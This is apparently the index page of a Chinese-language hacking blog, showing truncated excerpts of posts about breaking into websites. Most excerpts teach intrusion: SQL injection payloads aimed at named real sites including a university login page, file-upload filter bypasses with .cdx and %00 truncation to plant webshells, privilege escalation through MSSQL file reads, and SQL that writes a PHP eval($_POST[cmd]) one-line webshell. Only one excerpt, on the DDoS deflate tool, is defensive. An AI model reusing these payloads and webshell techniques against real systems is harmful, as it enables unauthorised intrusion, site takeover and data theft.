WebShell'S Blog

https://www.webshell.cc/answer_view.php?id=10291' //有注入 //常理走：报表。现在mysql几乎都是高级版本。所以一般就不猜测它的版本了。 https://www.webshell.cc/answer_view.php?id=10291%20and%202=4%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12...

- 阅读全文 -

一、SQL注入简介   SQL注入是比较常见的网络攻击方式之一，它不是利用操作系统的BUG来实现攻击，而是针对程序员编程时的疏忽，通过SQL语句，实现无帐号登录，甚至篡改数据库。 ===========================================   二、SQL注入攻击的总体思路   1.寻找到SQL注入的位置 2.判断服务器类型和后台数据库类型 ...

- 阅读全文 -

下面是一个上传地址：     右键—查看源代码，修改2处代码：     修改后：     保存为1.html     第一个上传选择正常的jpg图片，第2个选择我们的马， 这里asp过滤了，所以我选择cdx     成功突破， 右键—查看源代码     菜刀连接：

- 阅读全文 -

互联网如同现实社会一样充满钩心斗角，网站被DDOS也成为站长最头疼的事。在没有硬防的情况下，寻找软件代替是最直接的方法，比如用iptables，但是iptables不能在自动屏蔽，只能手动屏蔽。今天要说的就是一款能够自动屏蔽DDOS攻击者IP的软件：DDoS deflate。   DDoS deflate介绍 DDoS deflate是一款免费的用来防御和减轻DDoS攻击的脚本。它通过n...

- 阅读全文 -

upfile_other.asp/upload_other.asp等，使用upload_wj.inc模板来进行上传的地方，一把可以通过filepath构造.asp％00这样的截断路径来上传。   但是不是一定都会成功，主要说下碰到的错误：   1.Microsoft VBScript 运行时错误800a01f4 变量未定义: 'upload' 行12   这个错误没法...

- 阅读全文 -

简单的判断搜索型注入漏洞存在不存在的办法是先搜索'，如果出错，说明90%存在这个漏洞。然后搜索%，如果正常返回，说明95%有洞了。 然后再搜索一个关键字，比如2006吧，正常返回所有2006相关的信息，再搜索2006%'and 1=1 and '%'='和2006%'and 1=2 and '%'='，存在异同的话，就是100%有洞了。 我这里看出有上面说的洞后开始用nbsi来扫，结果总是超时，郁...

- 阅读全文 -

  以下是小菜新得 各位看管莫笑 老牛 飘过------ 废话不多说 开始 第一种注入 后台dbo 权限拿websehll 目标网站：http://bhst.edu.cn/manage/login.aspx 判断有无注入 输入” a’” 返回错误页面— 爆字表和字段 a’ having 1=1 -- a' and user>0--判断权限 看到dbo 权限我们 也部往下爆了 直接插...

- 阅读全文 -

一般的注入点像我这种菜鸟都会用以下方式 1：手工测试下 2：用明小子或者阿D直接浏览页面找注入点 3：通过搜索引擎site:xxx.com inurl:php or asp 之类的 4：safe3 jsky之类的工具抓取连接后工具自动判断~~~ 方式1缺点：只能测试部分页面拉，有点看运气的感觉 方式2缺点：基本和第一个的缺点差不多，不全面，只能浏览部分页面 方式3缺点：搜索引擎收录有限哈，有些站甚...

- 阅读全文 -

这两天一直入侵一个网站 各种提权 包括 mssql：SA mysql：ROOT 主机是星外的  可以看到目标目录 数据库是ASP的 不能插马 无奈找了很多人都木有办法。。。 今天无聊中查看目录 发现有一个高人上传了一个WEBSHELL 在网上找到了办法 发现用MSSQL读取文件的办法 现在分享一下     Use webshell.cc;--(这里是随便选的一个数据库) 　　drop table ...

- 阅读全文 -

文章中用到的SQL语句大体如下(命令行或者其它能执行SQL命令的shell都行)： Drop TABLE IF EXISTS temp; //如果存在temp就删掉 Create TABLE temp(cmd text NOT NULL); //建立temp表，里面就一个cmd字段 Insert INTO temp (cmd) VALUES('<? php eval($_POST[cmd])...

- 阅读全文 -